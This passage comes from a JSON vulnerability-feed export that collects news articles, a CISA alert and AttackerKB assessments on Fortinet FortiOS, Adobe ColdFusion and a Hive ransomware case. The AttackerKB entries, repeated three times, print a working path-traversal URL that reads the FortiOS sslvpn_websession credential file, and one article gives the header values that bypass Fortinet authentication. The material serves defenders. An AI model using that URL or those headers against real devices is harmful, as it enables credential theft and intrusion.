threats.\n\nCharlie Arehart, a security researcher credited with discovering and reporting the flaw alongside Pete Freitag, [described](<https://coldfusion.adobe.com/2023/03/released-coldfusion-2021-and-2018-march-2023-security-updates/#:~:text=To%20folks%20reading,old%20unsupported%20versions.\\)>) it as a \"grave\" issue that could result in \"arbitrary code execution\" and \"arbitrary file system read.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2023-03-16T04:47:00", "type": "thn", "title": "CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2023-26360"], "modified": "2023-03-16T09:17:07", "id": "THN:934BF6B94312FDB8317CCD9F5E46677C", "href": "https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-15T04:05:18", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiHjIXiW2zuHYHOZQbJKZD4p4uzwJHQdTAWhDUrxnxbxqVorwddxJ6Glgo6ERl_J1sIvlUI3AI6uug4KNSzj7-i_k6bmiZJO4-l33F5VRyfcJmN6tJHyz9cKIzx_FfcSyhR9ddrcoCcb5Gk5FgGjBg56GhIjX6JM3s3HkJJ7D0YkFii0-2B4IILpOZS/s728-e100/hack.jpg>)\n\nA proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches.\n\n\"FortiOS exposes a management web portal that allows a user to configure the system,\" Horizon3.ai researcher James Horseman [said](<https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/>). \"Additionally, a user can SSH into the system which exposes a locked down CLI interface.\"\n\nThe issue, tracked as [CVE-2022-40684](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) (CVSS score: 9.6), concerns an [authentication bypass](<https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/>) vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests.\n\nA successful exploitation of the shortcoming is tantamount to granting complete access \"to do just about anything\" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRUF5zXRq0j7JtozHreYQFvBZmHZaK79k53nzd5BkO7GRapjoRFkekYnIkcLCXVxw9mkLJS3UHKjGxK35wSa1VoHFc0Zf6y_GWxV0-TUy9uwKyXDgo3Jfsu6LvlLgEj49ayxN49j9vIbADLJYnPG5XgMHOvHquE-zMEAI94s02hvVLk4tDyYrLSqz4/s728-e100/poc.jpg>)\n\nThat said, the cybersecurity firm said that there are two essential prerequisites when making such a request -\n\n * Using the Forwarded header, an attacker is able to set the client_ip to \"127.0.0.1\"\n * The \"trusted access\" authentication check verifies that the client_ip is \"127.0.0.1\" and the User-Agent is \"Report Runner\" both of which are under attacker control\n\nThe release of the PoC comes as Fortinet [cautioned](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>) that it's already aware of an instance of active exploitation of the flaw in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory urging federal agencies to patch the issue by November 1, 2022.\n\nThreat intelligence firm GreyNoise has [detected](<https://viz.greynoise.io/tag/fortios-authentication-bypass-attempt?days=30>) 12 unique IP addresses weaponizing CVE-2022-40684 as of October 13, 2022, with a majority of them [located](<https://viz.greynoise.io/query/?gnql=cve%3ACVE-2022-40684>) in Germany, followed by the U.S., Brazil, China, and France.\n\nWordPress security company WordFence also said it [identified](<https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/>) probing attempts from 21 different IP addresses to \"determine whether a Fortinet appliance is in place,\" while also observing HTTP requests matching the PoC to add an SSH key to the admin user.\n\n**_Update:_** Amid a [huge uptick](<https://viz.greynoise.io/tag/fortios-authentication-bypass-attempt?days=30>) in vulnerability scans for the authentication bypass vulnerability, Fortinet on Friday released another advisory urging customers to upgrade affected appliances to the latest version as soon as possible.\n\n\"After multiple notifications from Fortinet over the past week, there are still a significant number of devices that require mitigation, and following the publication by an outside party of POC code, there is active exploitation of this vulnerability,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2022-40684>).\n\nIssues in Fortinet devices have been previously targeted by attackers to gain an initial foothold onto target networks. [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>), which has remained one of the most weaponized flaws in recent years, prompted the firm to issue [three follow-up alerts](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) in August 2019, July 2020, and again in April 2021.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-14T03:35:00", "type": "thn", "title": "PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-15T02:56:36", "id": "THN:3474CD6C25ADD60FF37EDC1774311111", "href": "https://thehackernews.com/2022/10/poc-exploit-released-for-critical.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-12T16:30:00", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhe-JObfxreJe3voT0gU0S71E013xl9EJTptEvFiIYrrr0cMALdF9FZR1Rc20JN7zmeC4ZC5In7OgjeASatCBiVJAMoaOPzikA75p2359zbFIla4cniv7wHpmaLMdvm4vDQ1qBrj6xaxkI0kesF0zlPgDbBpWlIDP7pInkBzVTb9UE9n5Gq14Dnjpq2/s728-e100/firewall.jpg>)\n\nFortinet on Monday revealed that the newly patched critical security vulnerability impacting its firewall and proxy products is being actively exploited in the wild.\n\nTracked as [CVE-2022-40684](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) (CVSS score: 9.6), the flaw relates to an authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager that could allow a remote attacker to perform unauthorized operations on the administrative interface via specially crafted HTTP(S) requests.\n\n\"Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user='Local_Process_Access,'\" the company [noted](<https://www.fortiguard.com/psirt/FG-IR-22-377>) in an advisory.\n\nThe list of impacted devices is below -\n\n * FortiOS version 7.2.0 through 7.2.1\n * FortiOS version 7.0.0 through 7.0.6\n * FortiProxy version 7.2.0\n * FortiProxy version 7.0.0 through 7.0.6\n * FortiSwitchManager version 7.2.0, and\n * FortiSwitchManager version 7.0.0\n\nUpdates have been released by the security company in FortiOS versions 7.0.7 and 7.2.2, FortiProxy versions 7.0.7 and 7.2.1, and FortiSwitchManager version 7.2.1.\n\nThe disclosure comes days after Fortinet [sent](<https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html>) \"confidential advance customer communications\" to its customers, urging them to apply patches to mitigate potential attacks exploiting the flaw.\n\nIf updating to the latest version isn't an option, it's recommended that users disable the HTTP/HTTPS administrative interface, or alternatively limit IP addresses that can access the administrative interface.\n\n**_Update:_** The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/10/11/cisa-has-added-one-known-exploited-vulnerability-catalog>) the Fortinet flaw to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, requiring federal agencies to apply patches by November 1, 2022.\n\nDetails and proof-of-concept (PoC) code for the vulnerability are [expected to become publicly available](<https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/>) in the coming days, in a move that could enable other threat actors to adopt the exploit to their toolset and mount their own attacks.\n\n\"Vulnerabilities affecting devices on the edge of corporate networks are among the most sought after by threat actors because it leads to breaching the perimeter, and CVE-2022-40684 allows exactly this,\" Zach Hanley, chief attack engineer at Horizon3.ai, said.\n\n\"Past Fortinet vulnerabilities, like [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>), have remained some of the [top exploited vulnerabilities](<https://thehackernews.com/2021/07/top-30-critical-security.html>) over the years and this one will likely be no different.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T06:21:00", "type": "thn", "title": "Fortinet Warns of Active Exploitation of Newly Discovered Critical Auth Bypass Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-12T13:16:52", "id": "THN:63560DA43FB5804E3B258BC62E210EC4", "href": "https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-22T04:41:36", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhmriVPdP9KN_Rm4QExIE-VxKOQQ4twUOdM58BlvGOsEAl9VBRy0Fu27FLtOqwW7dMGj-2Y_smCAtn3Dp-bzBYgnr6nLyRKDYMfsm77-oCCOnQmD0W1ux7ISFnVEQKBohRvtr1y5KRZm7ovqNFhapjxZHwlzsGYk1aK1QCSffFfVj5C8aPjX_T9ikSFwYAV/s728-e365/cf.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has [added](<https://www.cisa.gov/news-events/alerts/2023/08/21/cisa-adds-one-known-exploited-vulnerability-catalog>) a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, based on evidence of active exploitation.\n\nThe vulnerability, cataloged as [**CVE-2023-26359**](<https://nvd.nist.gov/vuln/detail/CVE-2023-26359>) (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 (Update 5 and earlier) that could result in arbitrary code execution in the context of the current user without requiring any interaction.\n\n[Deserialization](<https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data>) (aka unmarshaling) refers to the process of reconstructing a data structure or an object from a byte stream. But when it's performed without validating its source or sanitizing its contents, it can lead to [unexpected consequences](<https://www.acunetix.com/blog/articles/what-is-insecure-deserialization/>) such as code execution or denial-of-service (DoS).\n\n[](<https://thn.news/Cr7gkMdK> \"Cybersecurity\" )\n\nIt was [patched](<https://helpx.adobe.com/in/security/products/coldfusion/apsb23-25.html>) by Adobe as part of updates issued in March 2023. As of writing, it's immediately not clear how the flaw is being [abused in the wild](<https://viz.greynoise.io/tag/adobe-coldfusion-rce-cve-2023-26359-attempt?days=30>).\n\nThat said, the development comes more than five months after CISA [placed](<https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html>) another flaw impacting the same product (CVE-2023-26360) to the KEV catalog. Adobe said it's aware of the weakness being exploited in \"very limited attacks\" aimed at ColdFusion.\n\nIn light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary patches by September 11, 2023, to protect their networks against potential threats.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-08-22T03:36:00", "type": "thn", "title": "Critical Adobe ColdFusion Flaw Added to CISA's Exploited Vulnerability Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26359", "CVE-2023-26360"], "modified": "2023-08-22T03:40:20", "id": "THN:878B3321978CDB69F46C7A415B46701B", "href": "https://thehackernews.com/2023/08/critical-adobe-coldfusion-flaw-added-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2023-02-09T14:01:25", "description": "The Federal Bureau of Investigation (FBI) and CISA have released a [Joint Cybersecurity Advisory](<https://www.ic3.gov/Media/News/2021/210402.pdf>) (CSA) to warn users and administrators of the likelihood that advanced persistent threat (APT) actors are actively exploiting known Fortinet FortiOS vulnerabilities [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>), and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks.\n\nCISA encourages users and administrators to review [Joint CSA AA21-092A: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>) and implement the recommended mitigations.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "cisa", "title": "FBI-CISA Joint Advisory on Exploitation of Fortinet FortiOS Vulnerabilities ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-04-02T00:00:00", "id": "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:43:23", "description": "A Default Configuration vulnerability in FortiOS may allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 2:16pm UTC reported:\n\nOne of three vulnerabilities CISA and the FBI [have warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) are being exploited by APTs to gain initial access to government and other services. The other two vulnerabilities in the alert are [CVE-2018-13379](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=5591>), a pre-authentication path traversal bug that has been actively and widely exploited for years now, and [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812#view-assessment-91b4f49f-9243-4d47-9084-3ef8026411c2>) (an MFA bypass).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-5591", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2023-10-07T00:00:00", "id": "AKB:91756851-9B25-4801-B911-E3226A0656B5", "href": "https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T16:50:56", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\u201cPath Traversal\u201d) in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.\n\n \n**Recent assessments:** \n \n**bulw4rk** at March 25, 2020 8:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**gwillcox-r7** at November 04, 2020 4:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**ccondon-r7** at November 22, 2020 6:52pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from 